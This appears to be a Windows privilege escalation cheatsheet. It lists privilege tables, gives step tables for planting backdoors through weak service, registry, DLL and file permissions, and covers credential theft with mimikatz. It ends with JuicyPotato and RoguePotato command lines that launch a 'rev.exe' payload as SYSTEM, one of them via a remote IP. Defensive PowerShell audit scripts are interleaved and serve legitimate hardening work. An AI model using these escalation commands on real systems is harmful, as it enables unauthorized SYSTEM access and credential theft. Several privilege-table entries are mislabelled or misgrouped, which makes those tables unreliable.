Windows Privilege Escalation is a crucial technique for ethical hackers and security professionals to learn as it allows them to elevate their privileges on a Windows system and gain access to sensitive information or execute unauthorized actions. This Cheatsheet is a comprehensive guide to Windows Privilege Escalation that outlines various techniques for exploiting weak service permissions, unquoted service paths, DLL hijacking, weak registry permissions, insecure service startup, weak file permissions, weak credentials, and AlwaysInstallElevated. By following this Cheatsheet, security professionals can better understand how to identify and exploit Windows Privilege Escalation vulnerabilities to secure their own systems or to conduct ethical hacking activities.

Note that this is not an exhaustive list and there may be other privileges available depending on the version of Windows and the specific configuration of the system.


Security Management Privileges

| Privilege Name | Constant Name | Description |
| --- | --- | --- |
| Assign Primary Token | SE_ASSIGNPRIMARYTOKEN_NAME | Allows a process to replace the token that represents a client with another token. |
| Backup | SE_BACKUP_NAME | Allows a user or process to bypass file and directory permissions to back up the system. |
| Restore | SE_RESTORE_NAME | Allows a user or process to bypass file and directory permissions to restore the system. |
| Security | SE_SECURITY_NAME | Allows a user or process to modify security settings of objects, such as files, directories, and registry keys. |

System Privileges

| Privilege Name | Constant Name | Description |
| --- | --- | --- |
| Change Notify | SE_CHANGE_NOTIFY_NAME | Allows a user or process to receive notifications when a file or directory is changed. |
| Debug | SE_DEBUG_NAME | Allows a user or process to debug another process. |
| Shutdown | SE_SHUTDOWN_NAME | Allows a user or process to shut down the system. |
| System Time | SE_SYSTEMTIME_NAME | Allows a user or process to modify the system time. |
| Take Ownership | SE_TAKE_OWNERSHIP_NAME | Allows a user or process to take ownership of files, directories, and other objects. |

User Rights

| User Right | Constant Name | Description |
| --- | --- | --- |
| Access Credential Manager | SeInteractiveLogonRight | Allows a user to manage credentials, such as usernames and passwords, stored on the computer. |
| Change the System Time | SeSystemtimePrivilege | Allows a user to modify the system time. |
| Log on as a batch job | SeBatchLogonRight | Allows a user to log on as a batch job, which is a set of instructions that are processed in sequence, without requiring user interaction. |
| Log on as a service | SeServiceLogonRight | Allows a user to log on as a service, which is a program that runs in the background and provides a specific function to other programs or users. |
| Remote Desktop Services | SeRemoteInteractiveLogonRight | Allows a user to connect to the computer using Remote Desktop. |
| Restore Files and Directories | SeRestorePrivilege | Allows a user to restore files and directories, which is useful for recovering data that has been accidentally deleted or corrupted. |
| Shut down the system | SeShutdownPrivilege | Allows a user to shut down the system. |
| Take ownership of files or other objects | SeTakeOwnershipPrivilege | Allows a user to take ownership of files, directories, and other objects. |

Process Management Privileges

| Privilege Name | Constant Name | Description |
| --- | --- | --- |
| Create Process | SE_CREATE_PROCESS_NAME | Allows a user or process to create a new process. |
| Create Thread | SE_CREATE_THREAD_NAME | Allows a user or process to create a new thread within a process. |
| Debug Process | SE_DEBUG_NAME | Allows a user or process to debug another process. |
| Set Session ID | SE_ASSIGNPRIMARYTOKEN_NAME | Allows a user or process to set the session identifier (ID) for a process. |
| Terminate Process | SE_TERMINATE_NAME | Allows a user or process to terminate a process. |

Network Privileges

| Privilege Name | Constant Name | Description |
| --- | --- | --- |
| Access Network Connections | SE_NETWORK_NAME | Allows a user or process to access network-related information, such as the network address of a computer. |
| Impersonate a Client | SE_IMPERSONATE_NAME | Allows a user or process to impersonate another user, which means that the user or process can act as if it were the other user. This is useful for accessing network resources that are restricted to a particular user. |
| Manage auditing and security log | SE_AUDIT_NAME | Allows a user or process to manage the security log, which contains records of security-related events, such as logon attempts and file access attempts. |

Miscellaneous Privileges

| Privilege Name | Constant Name | Description |
| --- | --- | --- |
| Act as part of the operating system | SE_TCB_NAME | Allows a user or process to perform actions that are normally reserved for the operating system, such as installing device drivers and modifying system settings. |
| Allow log on locally | SeInteractiveLogonRight | Allows a user to log on locally to the computer. |
| Bypass traverse checking | SeChangeNotifyPrivilege | Allows a user or process to bypass checks that prevent the user or process from accessing files and directories that are located outside of the user's or process's scope. |
| Increase scheduling priority | SE_INC_BASE_PRIORITY_NAME | Allows a user or process to increase the scheduling priority of a process, which means that the process will be given more resources, such as CPU time, than other processes. |
| Load and unload device drivers | SE_LOAD_DRIVER_NAME | Allows a user or process to load and unload device drivers, which are programs that interact with hardware devices, such as printers and disk drives. |
| Lock pages in memory | SE_LOCK_MEMORY_NAME | Allows a user or process to lock pages in memory, which means that the pages cannot be paged out to the paging file. This is useful for programs that need to access data quickly and efficiently. |
| Profile system performance | SE_PROF_SINGLE_PROCESS_NAME | Allows a user or process to profile the performance of a single process, which means that the user or process can collect data about how much CPU time, memory, and other resources the process is using. |

Security and User Rights Privileges

| Privilege Name | Constant Name | Description |
| --- | --- | --- |
| Add workstations to domain | SeMachineAccountPrivilege | Allows a user or process to add computers to a domain. |
| Backup files and directories | SeBackupPrivilege | Allows a user or process to back up files and directories on the computer. |
| Change the system time | SeSystemtimePrivilege | Allows a user or process to change the system time on the computer. |
| Generate security audits | SeAuditPrivilege | Allows a user or process to generate security-related audit messages in the Security log. |
| Manage auditing and security log | SeSecurityPrivilege | Allows a user or process to manage the security log, which contains records of security-related events, such as logon attempts and file access attempts. |
| Modify firmware environment values | SeSystemEnvironmentPrivilege | Allows a user or process to modify the firmware environment variables on the computer, which are used to store configuration information for hardware devices. |
| Restore files and directories | SeRestorePrivilege | Allows a user or process to restore files and directories on the computer. |
| Take ownership of files or other objects | SeTakeOwnershipPrivilege | Allows a user or process to take ownership of files or other objects on the computer. This is useful for recovering access to files or directories that have been locked down or for troubleshooting permissions issues. |

Service Privileges

| Privilege Name | Constant Name | Description |
| --- | --- | --- |
| Create a token object | SeCreateTokenPrivilege | Allows a user or process to create a token object, which is an object that contains security-related information, such as the user's or process's identity and group memberships. This is useful for creating a new process with specific security settings. |
| Manage the backup and restore privileges | SeBackupPrivilege | Allows a user or process to manage the backup and restore privileges, which are used to back up and restore files and directories on the computer. |
| Query Service Status | SeQueryServiceStatusPrivilege | Allows a user or process to query the status of a service, which is a program that runs in the background and provides functionality to other programs. |
| Start a service | SeServiceLogonRight | Allows a user or process to start a service, which is a program that runs in the background and provides functionality to other programs. |
| Stop a service | SeServiceLogonRight | Allows a user or process to stop a service, which is a program that runs in the background and provides functionality to other programs. |

Virtualization Privileges

| Privilege Name | Constant Name | Description |
| --- | --- | --- |
| Create a virtual machine | SeCreateVirtualMachinePrivilege | Allows a user or process to create a virtual machine, which is a software emulation of a computer system. This is useful for running multiple operating systems or applications on a single computer or for creating test environments. |
| Modify firmware settings | SeSystemEnvironmentPrivilege | Allows a user or process to modify the computer's firmware settings, such as the boot order or startup configuration. This is useful for administrators who need to configure the computer's firmware or for troubleshooting issues related to the computer's startup process. |

Remote Desktop Privileges

| Privilege Name | Constant Name | Description |
| --- | --- | --- |
| Allow logon through Remote Desktop Services | SeRemoteInteractiveLogonRight | Allows a user to log on to a remote computer using Remote Desktop. This privilege is required for users who want to connect to a remote computer using Remote Desktop. |
| Deny logon through Remote Desktop Services | SeDenyRemoteInteractiveLogonRight | Denies a user the ability to log on to a remote computer using Remote Desktop. This privilege is useful for administrators who want to restrict Remote Desktop access to certain users or groups. |

Backup and Restore Privileges

| Privilege Name | Constant Name | Description |
| --- | --- | --- |
| Back up files and directories | SeBackupPrivilege | Allows a user or process to back up files and directories, which means that the user or process can create backups of files and directories even if they do not have explicit permissions to access them. This is useful for backup and disaster recovery purposes. |
| Restore files and directories | SeRestorePrivilege | Allows a user or process to restore files and directories, which means that the user or process can restore backups of files and directories to their original locations. This is useful for restoring data that has been lost or damaged. |

Cryptography Privileges

| Privilege Name | Constant Name | Description |
| --- | --- | --- |
| Create a pagefile | SeCreatePagefilePrivilege | Allows a user or process to create a pagefile, which is a file on disk that is used to store data that does not fit into physical memory. This is useful for improving system performance by providing additional virtual memory. |
| Manage volumes | SeManageVolumePrivilege | Allows a user or process to manage volumes, which are logical partitions on a disk. This is useful for managing disk space, creating new volumes, or troubleshooting issues related to disk management. |

Exploiting Weak Service Permissions

| Technique | Description |
| --- | --- |
| Find weak service permissions using tools like accesschk.exe or sc.exe | Search for services with weak file or registry permissions |
| Modify service binary or configuration file to include a backdoor | Replace the service binary or configuration file with a backdoored version |
| Start the service and gain elevated privileges | Start the vulnerable service to execute the backdoor with elevated privileges |

Exploiting Unquoted Service Paths

| Technique | Description |
| --- | --- |
| Identify services with unquoted service paths using the wmic service get name, displayname, pathname, startmode command | Search for services with unquoted service paths |
| Create a malicious file with the same name as the vulnerable service and place it in the directory specified by the service path | Create a malicious file and place it in a directory that the vulnerable service searches for executable files |
| Start the vulnerable service to execute the malicious file with elevated privileges | Start the vulnerable service to execute the backdoor with elevated privileges |
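For the defender's side of the two tables above (weak service permissions and unquoted service paths), the following PowerShell is an added example written for this page; it is not code from the original cheatsheet or from accesschk, sc.exe or wmic. It assumes English-locale group names, and the two service objects at the bottom are constructed so the path parser can be exercised without a live host; omit -Service to audit the real service list.

```powershell
# Added example (not from the original cheatsheet). Audits the service list for
#   1. unquoted binary paths containing spaces, listing each "prefix.exe" location
#      that Windows would try before the real executable, and
#   2. service binaries or their directories that a low-privileged group can write.
# Assumption: English-locale group names; adjust $LowPrivilegedPrincipals otherwise.

$LowPrivilegedPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')

function Test-LowPrivWritable {
    # $true when a low-privileged principal holds the WriteData/CreateFiles bit
    # (also implied by Write, Modify, FullControl, GENERIC_WRITE and GENERIC_ALL)
    # on the file or directory at $Path. Missing paths return $false.
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $writeMask = [int][System.Security.AccessControl.FileSystemRights]::WriteData -bor 0x40000000 -bor 0x10000000
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivilegedPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -ne 0) { return $true }
    }
    return $false
}

function Get-ServiceBinaryCandidate {
    # Splits a raw service PathName into the executable paths Windows would try.
    # A quoted path yields exactly one candidate. An unquoted path with spaces
    # yields every "prefix.exe" before the real binary (Intermediate = $true),
    # then the binary itself (Intermediate = $false).
    param([Parameter(Mandatory)][string]$PathName)
    $path = $PathName.Trim()
    if ($path.StartsWith('"')) {
        $end = $path.IndexOf('"', 1)
        if ($end -gt 0) {
            [pscustomobject]@{ Candidate = $path.Substring(1, $end - 1); Intermediate = $false }
        }
        return
    }
    $prefix = ''
    foreach ($token in ($path -split ' ')) {
        if ($token -match '^[-/]') { break }              # reached command-line switches
        $prefix = if ($prefix) { "$prefix $token" } else { $token }
        if ($prefix -match '\.exe$') {                     # the real executable
            [pscustomobject]@{ Candidate = $prefix; Intermediate = $false }
            break
        }
        [pscustomobject]@{ Candidate = "$prefix.exe"; Intermediate = $true }
    }
}

function Get-ServicePathExposure {
    # Emits one row per candidate path per service, with write-exposure flags.
    param([object[]]$Service = (Get-CimInstance -ClassName Win32_Service))
    foreach ($svc in $Service) {
        if ([string]::IsNullOrWhiteSpace($svc.PathName)) { continue }
        foreach ($c in (Get-ServiceBinaryCandidate -PathName $svc.PathName)) {
            $dir = Split-Path -Path $c.Candidate -Parent
            [pscustomobject]@{
                Service           = $svc.Name
                StartName         = $svc.StartName
                Candidate         = $c.Candidate
                Intermediate      = $c.Intermediate
                BinaryWritable    = Test-LowPrivWritable -Path $c.Candidate
                DirectoryWritable = Test-LowPrivWritable -Path $dir
            }
        }
    }
}

# Constructed sample services (not from a real host) to show the parser's output;
# drop -Service to audit the live service list instead.
$sample = @(
    [pscustomobject]@{ Name = 'GoodSvc'; StartName = 'LocalSystem'; PathName = '"C:\Program Files\Good Vendor\good.exe" -service' }
    [pscustomobject]@{ Name = 'WeakSvc'; StartName = 'LocalSystem'; PathName = 'C:\Program Files\Weak Vendor\Tool Suite\svc.exe -k netsvcs' }
)
Get-ServicePathExposure -Service $sample | Format-Table -AutoSize
```

For WeakSvc the parser yields C:\Program.exe, C:\Program Files\Weak.exe and C:\Program Files\Weak Vendor\Tool.exe as intermediate candidates before the real svc.exe; GoodSvc yields only its quoted binary. The same Test-LowPrivWritable check is what the later items on insecure service startup and weak file permissions call for. It ignores Deny entries and nested group membership, so treat a hit as something to verify rather than a confirmed finding. The remediation for an unquoted path is to quote ImagePath; for a writable binary or directory, to restrict write access to administrators and SYSTEM.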

Exploiting DLL Hijacking

| Technique | Description |
| --- | --- |
| Identify vulnerable applications using tools like procmon.exe or dependencywalker.com | Search for applications that load DLLs with a predictable name from a directory that is writable by the attacker |
| Create a malicious DLL with the same name as the vulnerable DLL and place it in a directory that the application searches for DLLs | Create a malicious DLL and place it in a directory that the vulnerable application searches for DLLs |
| Start the vulnerable application to execute the malicious DLL with elevated privileges | Start the vulnerable application to execute the backdoor with elevated privileges |

Exploiting Weak Registry Permissions

| Technique | Description |
| --- | --- |
| Find weak registry permissions using tools like accesschk.exe or regedit.exe | Search for registry keys with weak permissions |
| Modify a registry key to include a backdoor | Modify a vulnerable registry key to include a backdoor |
| Restart the system to gain elevated privileges | Restart the system to execute the backdoor with elevated privileges |
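The registry side of this check, as an added example for this page (not code from the original cheatsheet, accesschk or regedit): it lists per-service keys whose ACL grants a low-privileged group a write-class right, and it also tests the AlwaysInstallElevated policy mentioned in the introduction. Group names are assumed to be the English-locale ones.

```powershell
# Added example (not from the original cheatsheet). Checks two registry exposures:
#   1. per-service keys under HKLM:\SYSTEM\CurrentControlSet\Services whose ACL lets
#      a low-privileged group change values such as ImagePath, and
#   2. the AlwaysInstallElevated policy (1 in both HKLM and HKCU means MSI packages
#      launched by any user are installed with SYSTEM privileges).
# Assumption: English-locale group names.

$LowPrivilegedPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')

function Get-WeakServiceKeyAcl {
    param([string]$Root = 'HKLM:\SYSTEM\CurrentControlSet\Services')
    # Rights that let a principal redirect or take over the service key. WriteKey and
    # FullControl are deliberately not in the mask: both include ReadPermissions,
    # which every read-only ACE also carries and would produce false positives.
    $writeMask = [int][System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, ChangePermissions, TakeOwnership' -bor 0x40000000 -bor 0x10000000
    foreach ($key in (Get-ChildItem -Path $Root -ErrorAction SilentlyContinue)) {
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($LowPrivilegedPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (([int]$ace.RegistryRights -band $writeMask) -eq 0) { continue }
            [pscustomobject]@{
                Key       = $key.PSChildName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                ImagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
            }
        }
    }
}

function Test-AlwaysInstallElevated {
    # $true only when both policy values are 1; either one alone has no effect.
    $paths = @('HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
               'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer')
    $values = foreach ($p in $paths) {
        (Get-ItemProperty -Path $p -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    }
    return (@($values | Where-Object { $_ -eq 1 }).Count -eq 2)
}

Get-WeakServiceKeyAcl | Format-Table -AutoSize
"AlwaysInstallElevated effective: $(Test-AlwaysInstallElevated)"
```

Run it elevated so every service key can be read. A writable service key is the registry equivalent of a writable service binary, since ImagePath decides what runs when the service starts; the fix is to restore the default ACL on the key. AlwaysInstallElevated should be 0 or absent in both hives.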

Exploiting Insecure Service Startup

| Technique | Description |
| --- | --- |
| Find services that run with high privileges using tools like sc.exe, tasklist.exe, or Task Manager | Search for services that run with high privileges and can be stopped and started by non-administrative users |
| Stop the service and replace the binary or configuration file with a backdoored one | Stop the vulnerable service and replace the binary or configuration file with a backdoored version |
| Start the service to execute the backdoor with elevated privileges | Start the vulnerable service to execute the backdoor with elevated privileges |

Exploiting Weak File Permissions

| Technique | Description |
| --- | --- |
| Find files with weak permissions using tools like accesschk.exe or cacls.exe | Search for files with weak permissions that are executed by an administrator |
| Modify the file to include a backdoor | Modify the vulnerable file to include a backdoor |
| Wait for an administrator to execute the file to gain elevated privileges | Wait for an administrator to execute the vulnerable file, which runs the backdoor with elevated privileges |

Exploiting Weak Credentials

| Technique | Description |
| --- | --- |
| Find weak credentials using tools like hashdump.exe, mimikatz.exe, or metasploit-framework | Search for weak or default credentials |
| Use the credentials to gain administrative access to the system | Use the obtained credentials to gain administrative access to the system |

Exploiting Clear Text password

| Technique | Description |
| --- | --- |
| Identify services, applications or scripts that store passwords in clear text | Search for clear text passwords in configuration files, scripts, or memory dumps using tools like grep or strings |
| Extract the clear text password | Extract the password from the configuration file, script, or memory dump using tools like awk, sed, or python |
| Use the obtained credentials to gain administrative access to the system | Use the obtained credentials to gain administrative access to the system |

Note: clear text passwords are a significant security risk. Use secure password storage methods, such as encryption or hashing, to protect sensitive information.
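To locate the clear text passwords the table describes, here is an added example for this page (not from the original cheatsheet, and not a grep or strings invocation): a PowerShell scanner that searches a directory tree for credential-style assignments and masks the value in its output, so findings can go into a report without copying the secret. The file extensions and key names are assumptions; the web.config and backup.ini at the bottom are constructed in a temporary directory so the run is self-contained.

```powershell
# Added example (not from the original cheatsheet). Scans text files for
# credential-looking assignments and reports file, line and key with the value
# masked. The extensions and key names below are assumptions; extend them per
# environment.

function Find-ClearTextCredential {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string[]]$Include = @('*.config', '*.xml', '*.ini', '*.txt', '*.ps1', '*.bat', '*.json')
    )
    # Matches key=value, key: value and key="value" for common secret key names.
    # Group 1 is the key, group 2 the value (stops at whitespace, quote, ; or <).
    $pattern = '(?i)\b(password|passwd|pwd|secret|connectionstring|apikey|token)\b\s*[:=]\s*["'']?([^"''\s<;]+)'
    Get-ChildItem -Path $Path -Recurse -File -Include $Include -ErrorAction SilentlyContinue |
        Select-String -Pattern $pattern -AllMatches |
        ForEach-Object {
            foreach ($m in $_.Matches) {
                $value = $m.Groups[2].Value
                [pscustomobject]@{
                    File   = $_.Path
                    Line   = $_.LineNumber
                    Key    = $m.Groups[1].Value
                    # Keep two characters so the owner can recognise the entry; never the full value.
                    Masked = if ($value.Length -le 4) { '****' } else { $value.Substring(0, 2) + ('*' * ($value.Length - 2)) }
                }
            }
        }
}

# Constructed sample: write throwaway config files into a temp folder, scan, clean up.
$dir = Join-Path ([IO.Path]::GetTempPath()) ('cred-scan-' + [guid]::NewGuid().ToString('N'))
New-Item -ItemType Directory -Path $dir | Out-Null
@'
<connectionStrings>
  <add name="db" connectionString="Server=sql01;User Id=svc_app;Password=Winter2024!;" />
</connectionStrings>
'@ | Set-Content -Path (Join-Path $dir 'web.config')
"backup_user=ops`npassword = S3cretValue" | Set-Content -Path (Join-Path $dir 'backup.ini')

Find-ClearTextCredential -Path $dir | Format-Table -AutoSize
Remove-Item -Path $dir -Recurse -Force
```

On the constructed input this reports the connectionString and Password entries from web.config and the password line from backup.ini, each with the value masked. Point -Path at application directories, scheduled-task script folders and user profiles when auditing a real host; every hit is a credential that should move into a secret store or an encrypted configuration section.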

Dangerous User Privileges

Some user privileges are dangerous because they can be used to escalate to a higher privilege level. Some of them are listed below:

SeImpersonatePrivilege

A process holding this privilege can impersonate any other user, including Administrator. It can be exploited with JuicyPotato.

SeAssignPrimaryTokenPrivilege

Allows assigning an access token to a new process. It can be exploited with JuicyPotato.

SeBackupPrivilege

A user with this privilege can read files regardless of their permissions, which means the password hashes can be extracted from the registry and used in a pass-the-hash attack.

SeRestorePrivilege

This privilege lets a user modify service binaries and DLLs, and also modify registry settings.

Other risky privileges

  1. SeCreateTokenPrivilege
  2. SeLoadDriverPrivilege
  3. SeDebugPrivilege
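To see which of these privileges the current token actually holds, here is an added example for this page (not from the original cheatsheet): a PowerShell parser for whoami /priv output that flags the seven privileges listed above. The whoami output embedded at the bottom is constructed, and the Enabled/Disabled strings are the English-locale values.

```powershell
# Added example (not from the original cheatsheet). Parses `whoami /priv` output
# and flags the privileges this page lists as risky. Assumption: English-locale
# output (the "Enabled"/"Disabled" state words differ on localised systems).

$RiskyPrivileges = @(
    'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeBackupPrivilege',
    'SeRestorePrivilege', 'SeCreateTokenPrivilege', 'SeLoadDriverPrivilege', 'SeDebugPrivilege'
)

function Get-RiskyTokenPrivilege {
    [CmdletBinding()]
    param(
        # Raw lines of `whoami /priv`; defaults to running it for the current token.
        [string[]]$WhoamiOutput = (whoami /priv)
    )
    foreach ($line in $WhoamiOutput) {
        # Data rows look like: "SeDebugPrivilege   Debug programs   Enabled"
        if ($line -match '^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$') {
            $name = $Matches[1]
            if ($RiskyPrivileges -contains $name) {
                [pscustomobject]@{
                    Privilege   = $name
                    Description = $Matches[2]
                    State       = $Matches[3]
                }
            }
        }
    }
}

# Constructed sample output (not captured from a real host) so the parser can be
# exercised anywhere; omit -WhoamiOutput to inspect the current token.
$sample = @'
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
'@ -split "`r?`n"

Get-RiskyTokenPrivilege -WhoamiOutput $sample | Format-Table -AutoSize
```

On the sample this returns a single row for SeImpersonatePrivilege. Disabled rows still count: a process can enable any privilege present in its token, so the set to act on is everything the parser returns, not only the Enabled entries. Service accounts holding SeImpersonatePrivilege are the usual finding and are what the Potato family below relies on; restricting which accounts receive the right, and running services under virtual or managed service accounts with the minimum set, is the mitigation.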

Hot Potato Exploit

A Tutorial: https://pentestlab.blog/2017/04/13/hot-potato/

Windows 7

.\Potato.exe -ip <local ip> -cmd <command to run> -enable_defender true -enable_spoof true -disable_exhaust true

Windows 10

.\Potato.exe -ip <local ip> -cmd <cmd to run> -disable_exhaust true -disable_defender true

Juicy Potato

If the account holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, JuicyPotato can be used to escalate privileges.

Note: CLSID can be found in: https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

JuicyPotato.exe -l 4444 -p C:\Windows\Temp\Rev.exe -t * -c {CLS_ID}

Rogue Potato

Another Windows local privilege escalation from a service account to SYSTEM, so the requirement is that the account you have access to is a service account.

.\RoguePotato.exe -r 192.168.1.11 -l 9999 -e "C:\Windows\Temp\rev.exe"